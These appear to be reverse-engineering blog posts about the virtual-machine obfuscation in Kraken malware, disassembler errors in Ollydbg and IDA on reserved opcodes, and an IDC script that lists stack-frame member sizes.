From what I have seen there are more than 45 vm_instructions in the virtual machine; to identify each vm_instruction you have to remove a lot of junk code. Even when you have all the vm_instructions, it’s not immediately clear what the malware is trying to do.
Example: here are the vm_instructions used to patch a dword at 0x41CE06 (the first column is the initial address of the vm_instruction, the second column is the name I gave to the vm_instruction):

401028: push_dword val // push F440C1CB
401028: push_dword val // push 8040414A
40F5BE: nor_stack // The value at vm_esp+4 is updated with a nor(vm_esp+4, vm_esp) operation
4105FA: pop_dword r_i // r_15 = 0x00000202
40F36F: push_dword r_i // r_0 = 0x0041CE05
401028: push_dword val // push 98754A9F
401028: push_dword val // push 43179031
40F198: push_dword vm_esp // push vm_esp
401396: mov_stack_pstack // mov dword ptr [vm_esp], dword ptr [dword ptr [vm_esp]]
40F25C: pop_word r_i // r_14 = 0x00009031
401028: push_dword val // push 678AB562
40F198: push_dword vm_esp // push vm_esp
40FEF3: push_bdword val // push 0x00000006, push a dword but the last 24 bits are 0, so it's like a push byte extended to dword
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp]
4105FA: pop_dword r_i // r_15 = 0x216
40F0A0: pp_mov_dword // mov dword ptr [pop t1], (pop t2)
40F25C: pop_word r_i // r_11 = 0x015E4317
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp] <-- 98754A9F + 678AB562 = 1
4105FA: pop_dword r_i // r_14
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp] <-- 41CE05 + 1 = 41CE06
4105FA: pop_dword r_i // r_15
410171: mov_stack_pstack // mov dword ptr [dword ptr [vm_esp]], dword ptr [vm_esp+4] <-- patch
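The two add_stack comments above only make sense with 32-bit wraparound, so here is the arithmetic spelled out. The helper names are mine; `nor32` just shows what a NOR of the first two pushed values gives, the listing doesn't say how that result is used afterwards.

```python
MASK32 = 0xFFFFFFFF

def add32(a, b):
    """32-bit addition with wraparound, like add_stack."""
    return (a + b) & MASK32

def nor32(a, b):
    """32-bit NOR, like nor_stack."""
    return ~(a | b) & MASK32

delta = add32(0x98754A9F, 0x678AB562)   # the sum overflows and leaves 1
target = add32(0x0041CE05, delta)       # address that gets patched

print("%X %X" % (delta, target))
print("%08X" % nor32(0xF440C1CB, 0x8040414A))
```

Two random-looking constants are pushed only to obtain the value 1, which is then added to 41CE05 to build the address 41CE06.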

Quite a simple patch operation, but the author didn’t use the straight way for sure. Believe it or not, this is the nature of the malware. Now you can understand the phrase: “Don’t think to trace the entire exe, it’s madness!”.

I tried inspecting some more samples of the same Kraken family. There are some similarities/differences:
- they are protected by a virtual machine too
- the routine used to select the next vm_instruction is not the same
- (I think) the vm_instructions are equal, but they are not defined in the same way. I mean, the code used to define a push is not the same but the result is the same; in fact in both cases you have a push vm_instruction
- the (encrypted)Instruction Table is not the same. At index i you won’t have the same vm_instruction for malware_x and malware_y
- the vm protection exists for the spawned file too

Now I fully understand the words used by the author of the interview, it’s complex to understand what’s going on…

Just yesterday a new version of Ollydbg was released, but I’m still using the old 1.10 version. It’s a really good debugger, and until some days ago I had hit very few errors inside the disasm engine, nothing compared with Ida’s bug btw. Look here:

0047C720 6E OUTS DX,BYTE PTR ES:[EDI]
0047C721 6F OUTS DX,DWORD PTR ES:[EDI]

According to Intel Manual’s opcode map 0x6E is defined as “OUTS/OUTSB DX, Xb”.
The first operand is DX register, and the second one is defined as an “Xb” operand.
X: memory addressed by DS:(E)SI…
b : byte, regardless of operand-size attribute
The error is obvious, Ollydbg shows EDI instead of ESI.

There’s something similar with A6 opcode. Ollydbg v1.10 shows:
004012FA A6 CMPS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
but the right line is:
004012FA A6 CMPS BYTE PTR DS:[ESI],BYTE PTR ES:[EDI]

It’s an oversight in the X and Y addressing methods.
The errors occur in v1.10 only, v2 shows the right instructions. I asked Olly (Oleh Yuschuk) and he kindly replied: “Unfortunately, I will not correct it in 1.10…This project is closed, and I don’t want to make any modifications.”. Ok, I’ll switch to v2.

A few days ago I was inspecting a malware using my disassembler, and I stumbled on this piece of code:

[Screenshot: C6 opcode in diZaZZembler]

I use “!?!?!” string for undefined/reserved opcode. I had some problems testing reserved opcodes so I decided to check this case carefully. The first check is given by a comparative method, I loaded the malware into IDA. Look here:

[Screenshot: C6 opcode in Ida]

The first thing I thought of was: “Damn, there’s a bug inside my disasm engine”.

I took a look at the printed version of my “Intel® IA-32 Architectures Software Developer’s Manual – Volume 2B: Instruction Set Reference, N-Z”. According to one-byte opcode map, C6 opcode is defined as a “Grp 11 (1A) – MOV”.

What does it mean?
The opcode alone can’t give me the exact meaning of the instruction. I need some extra information, which is given by the opcode extension: the ModR/M byte (0x22 in the example). To retrieve the necessary information about this opcode I have to check a new table: “Opcode Extensions for One- and Two-byte Opcodes by Group Number”. I’m interested in the row denoted as Group_11:

[Image: Group 11 row of the opcode extension table]

This is only a part of the entire table, it shows the header and the row of the group I’m focused on.

ModR/M byte is divided into 3 parts: mod, nnn and r/m.
0x22 = 00100010b
mod = 00 (bit 7, 6)
nnn = 100 (bit 5, 4, 3)
r/m = 010 (bit 2,1,0)

These numbers help you locate the right instruction definition in the opcode extension table. To cut it short, the nnn value identifies the right cell to pick. In this case 100b points to a blank cell, what does it mean?
According to Intel manual: “All blanks in all opcode maps are reserved and must not be used. Do not depend on the operation of undefined or reserved opcodes”.
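The bit splitting above is easy to get wrong by hand, so here it is as a short Python sketch. `split_modrm` follows the three fields exactly as listed; `c6_is_defined` assumes that in the Group 11 row only the nnn = 000 cell (MOV) is filled for the C6 opcode, which is what I read in my edition of the manual and may differ in newer ones.

```python
def split_modrm(byte):
    """Split a ModR/M byte into (mod, nnn, r/m)."""
    mod = (byte >> 6) & 0b11    # bits 7, 6
    nnn = (byte >> 3) & 0b111   # bits 5, 4, 3
    rm = byte & 0b111           # bits 2, 1, 0
    return mod, nnn, rm

def c6_is_defined(modrm):
    """Assumption: for opcode C6 only nnn = 000 (MOV) is a non-blank cell."""
    return split_modrm(modrm)[1] == 0

print(split_modrm(0x22), c6_is_defined(0x22))
print(split_modrm(0x02), c6_is_defined(0x02))
```

With 0x02 as ModR/M byte (same mod and r/m, nnn = 000) the instruction would be a regular mov byte ptr [edx], imm8.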

Is it really an invalid instruction? All my initial investigations were done using the printed version of the Intel manual, and since I had found some errors in it I decided to look at the most recent online version.
This new check doesn’t change anything; it seems IDA is able to disassemble an invalid instruction. Weird.

Now the question is: is this a bug or do they (IDA’s developers) know how to handle undocumented opcodes? To answer this question I have two options:
1. try loading the malware into some more disassemblers
2. try stepping the instruction using a debugger

Option number 1
Windbg’s output:

c6 Windbg

Ollydbg’s output

c6 Ollydbg

The result is the same in both: it’s an invalid instruction.

Option number 2
This is the last check I did. I wrote a new exe file including an instruction with C6 opcode in it. The program is really simple and the source is right here:

.text:00401000 BA B2 10 40 00 mov edx, offset word_4010B2
.text:00401005 C6 22 FB mov byte ptr [edx], 0FBh
.text:00401008 6A 00 push 0
.text:0040100A 68 1D 30 40 00 push offset Caption
.text:0040100F 68 55 30 40 00 push offset Text
.text:00401014 6A 00 push 0
.text:00401016 E8 91 00 00 00 call MessageBoxA
.text:0040101B C3 retn

According to Ida it should write a byte to address 0x4010B2 (which has full access) and then show a simple message box, nothing more. Unfortunately, that is not what happens.

If you run the file without a debugger it crashes and the classic error box appears. Looking inside the error box I see that the error occurs at offset 0x1005, the C6 opcode!
If you run the file with Ollydbg you’ll get almost the same result: the debugger stops, signalling the error “Illegal instruction” at 0x401005. Again, the C6 opcode!
If you run the file using IDA’s debugger you’ll get a simple warning: “An attempt was made to execute an illegal instruction (0x401005)”. After that you’ll get a sequence of error boxes; it seems Ida’s debugger is not fully able to handle the execution of an illegal instruction… but that’s another story.

I did some more tests and it seems that the problem occurs with all the *blank cells*; I tried all the possible C6 combinations and some different opcodes too. The result is always the same: Ida shows a disassembled instruction which is totally wrong!!!

I tried reading Ida’s help file but there was no mention of the problem, and I don’t think there’s a hidden option to set. I tried googling without luck. Because of this I’m not 100% sure but… I think it’s a bug!

Among all the precious information retrieved by Ida there’s something I always use when I need to study a target: the stack frame. It’s quite useful when you want to see the list of parameters and local variables, but it would be great to see the size of each item too. Yes, you can get the length, but you have to calculate it each time. I sometimes need this kind of information, especially when I have to deal with fixed-length buffers. I looked through some of Ida’s menus without luck. It’s strange that Ida doesn’t provide such information, so I decided to write a little idc script able to retrieve local *big* buffers. (If there’s a hidden Ida feature, please tell me…)

I wanted to attach the original script I wrote here, but I think it’s much more useful to explain some details about the functions I used, leaving the script to you as an exercise. In this simple example I’ll show you how to find out the length of each item inside a stack frame. Let’s start with a simple function:

stack frame 1

The stack frame created by Ida is divided into some parts, it looks like a sequence of fields:

- local variables
- saved registers
- return address
- function parameters

Looking at the picture above, it’s pretty easy to locate the local variables (ObjectAttributes, KeyValueInformationLength, ResultLength) and the function parameters (Handle, ValueName). Moreover, you can guess the length of each item. Of the four parts I mentioned above, two are not shown by Ida: “saved registers” and “return address”. If you look at the offset of each item you’ll surely notice something odd. Look at the gap between ResultLength and Handle: 0x0C bytes. 4 bytes are reserved for the ResultLength variable, which leaves 8 unreferenced bytes. It’s time to take a look at the stack frame window (ctrl-k):

Stack frame 2

Here is the answer. Ida uses two special fields named “ r” and “ s”, and the length of each field is 4 bytes. They are the “return address” and the “saved registers”.

Ok, how to get the size of the items using an idc script? As you can see from the picture the stack frame looks like a structure definition, the idea is to read each item in sequence.

#include <idc.idc>

static main()
{
    auto id, i, firstM, lastM, address;
    auto mName, mSize, mFlag;

    address = 0x00013C92; // Address of the function to check
    id = GetFrame(address); // Id of the function frame structure
    firstM = GetFirstMember(id); // Offset of the first member
    lastM = GetLastMember(id); // Offset of the last member

    for(i=firstM;i<=lastM;i++)
    {
        mName = GetMemberName(id,i); // Get the name
        mSize = GetMemberSize(id, i); // Get the size (in bytes)
        mFlag = GetMemberFlag(id, i); // Get the flag
        Message("\n%s %d %x", mName, mSize, mFlag);
    }
}

First of all I need to get the function frame structure. I use GetFrame, which returns the id of the function frame structure. It’s the first piece of information to retrieve, because you need the id whenever you deal with the internal fields of the structure. Once you have the id you can scan the entire structure from the first to the last item. The GetFirstMember and GetLastMember functions give you the first and the last offset. At this point you can retrieve all the information you need; in this example I get the name, size and flag value of every item. The functions I used are GetMemberName, GetMemberSize and GetMemberFlag: pretty intuitive and easy to use. An output line will look like:

ObjectAttributes 24 60000400

where name=ObjectAttributes, size=24 and flag=60000400. What kind of information is hidden inside the flag value? The idc.idc file contains all the necessary definitions:
#define FF_DATA 0x00000400L // Data ?
#define FF_STRU 0x60000000L // Struct ?

The field contains data and it’s a structure (OBJECT_ATTRIBUTES). And what about the Handle field?

Handle 4 25500400

Browsing idc.idc file you’ll get:
#define FF_DATA 0x00000400L // Data ?
#define FF_0OFF 0x00500000L // Offset?
#define FF_1OFF 0x05000000L // Offset?
#define FF_DWRD 0x20000000L // dword
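Reading the two flag values by hand can be mirrored with a small Python sketch. The FF_* values are the ones quoted above; the four mask names and values (`MS_CLS`, `DT_TYPE`, `MS_0TYPE`, `MS_1TYPE`) are written from memory of idc.idc and should be treated as assumptions, and the `describe` helper is made up for the example. Comparing against a mask matters here: a plain AND with FF_DWRD would also match a structure, because 0x60000000 contains the 0x20000000 bit.

```python
# Values quoted from idc.idc in the text above.
FF_DATA = 0x00000400
FF_STRU = 0x60000000
FF_DWRD = 0x20000000
FF_0OFF = 0x00500000
FF_1OFF = 0x05000000

# Assumed masks (recalled from idc.idc, not quoted in the post).
MS_CLS = 0x00000600    # class of the item: code, data, tail, unknown
DT_TYPE = 0xF0000000   # data type of the item
MS_0TYPE = 0x00F00000  # representation of the first operand
MS_1TYPE = 0x0F000000  # representation of the second operand

def describe(flag):
    """Return the properties encoded in a member flag (hypothetical helper)."""
    parts = []
    if (flag & MS_CLS) == FF_DATA:
        parts.append("data")
    if (flag & DT_TYPE) == FF_STRU:
        parts.append("struct")
    if (flag & DT_TYPE) == FF_DWRD:
        parts.append("dword")
    if (flag & MS_0TYPE) == FF_0OFF:
        parts.append("op0 offset")
    if (flag & MS_1TYPE) == FF_1OFF:
        parts.append("op1 offset")
    return parts

print(describe(0x60000400))  # ObjectAttributes
print(describe(0x25500400))  # Handle
```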

Ok, there’s only a little behaviour to fix inside the script. Run the script and you’ll see some repeated lines, here’s a snippet taken from the output:

...
ObjectAttributes 24 60000400
ObjectAttributes 24 60000400
ObjectAttributes 24 60000400
KeyValueInformationLength 4 20000400
KeyValueInformationLength 4 20000400
KeyValueInformationLength 4 20000400
KeyValueInformationLength 4 20000400
ResultLength 4 20000400
ResultLength 4 20000400
ResultLength 4 20000400
...

Ida repeats the field information for every byte of the field itself. To display only one line per field you can update the ‘i’ variable inside the for statement by adding the next line after the Message instruction:
i = i + GetMemberSize(id, i) - 1;

The example ends here. It works almost fine, but it goes into an infinite loop with certain functions. From what I’ve seen, the problem occurs when Ida is not able to understand which kind of variable has been declared. Look at this simple example:

...
INIT:BF9B0786 var_1A4 = dword ptr -1A4h
INIT:BF9B0786 var_18E = byte ptr -18Eh
INIT:BF9B0786 var_4 = dword ptr -4
...

var_18E is marked as a byte but there’s a big gap between var_18E and var_4. The stack frame window reveals an interesting thing:

-0000018E var_18E db ?
-0000018D db ? ; undefined
-0000018C db ? ; undefined
-0000018B db ? ; undefined
-0000018A db ? ; undefined
-00000189 db ? ; undefined
-00000188 db ? ; undefined
-00000187 db ? ; undefined
-00000186 db ? ; undefined
-00000185 db ? ; undefined
-00000184 db ? ; undefined
-00000183 db ? ; undefined

The length of var_18E is 394 bytes, and as you can see Ida doesn’t collapse the definition into a single line: it “explodes” the variable across the 394 bytes.
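The 394 figure is just the distance between two consecutive offsets in the listing. A minimal Python sketch of that arithmetic follows; the `spans` helper is hypothetical, and it assumes the local variables end at offset 0, where the saved registers begin. The result is an upper bound on each variable, since undefined bytes are counted as part of the variable that precedes them.

```python
def spans(offsets):
    """Map each variable to the distance up to the next named variable.

    offsets: name -> frame offset as shown in the function header
    (negative for locals). Assumption: the locals end at offset 0.
    """
    ordered = sorted(offsets.items(), key=lambda item: item[1])
    next_offsets = [off for _, off in ordered[1:]] + [0]
    return {name: nxt - off for (name, off), nxt in zip(ordered, next_offsets)}

# Offsets copied from the listing above.
locals_ = {"var_1A4": -0x1A4, "var_18E": -0x18E, "var_4": -0x4}
for name, size in spans(locals_).items():
    print(name, size)
```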
How can you solve this problem? You can use my initial script adding some more checks. Nothing hard of course, you have all the necessary functions, just use your brain defining a good algo. Hint: take a look at the value returned by GetMemberSize.
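To make the hint a bit more concrete without giving the idc script away, here is one possible shape of the algorithm, modelled in plain Python. Everything in it is a stand-in: `FRAME` is a toy frame built from the three variables above, `member_size` only imitates GetMemberSize, and the sketch assumes that a lookup on a byte belonging to no member reports -1, which I have not verified on every Ida version.

```python
# Toy frame: start offset -> (name, size in bytes), counted from the
# start of the frame. All other bytes are undefined.
FRAME = {0x000: ("var_1A4", 4), 0x016: ("var_18E", 1), 0x1A0: ("var_4", 4)}

def member_size(frame, offset):
    """Stand-in for GetMemberSize: -1 when no member starts at offset.
    (The real function also answers for bytes inside a member.)"""
    entry = frame.get(offset)
    return entry[1] if entry else -1

def walk(frame, first, last):
    """Return one (name, size) row per member, merging undefined runs."""
    rows, gap, off = [], 0, first
    while off <= last:
        size = member_size(frame, off)
        if size <= 0:
            # Undefined byte: never step backwards, just count it.
            gap += 1
            off += 1
            continue
        if gap:
            rows.append(("<undefined>", gap))
            gap = 0
        rows.append((frame[off][0], size))
        off += size  # jump over the whole member
    if gap:
        rows.append(("<undefined>", gap))
    return rows

for name, size in walk(FRAME, 0x000, 0x1A3):
    print(name, size)
```

The important part is the size check: with a non-positive size the original update of ‘i’ moves backwards, which would explain the infinite loop. Counting the undefined run instead also gives you the real extent of a buffer like var_18E.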

Once you have a working script you can extend it covering all the declared functions and filtering the information you’ll get.

Good luck, and let me know if you are not able to solve this exercise!!!
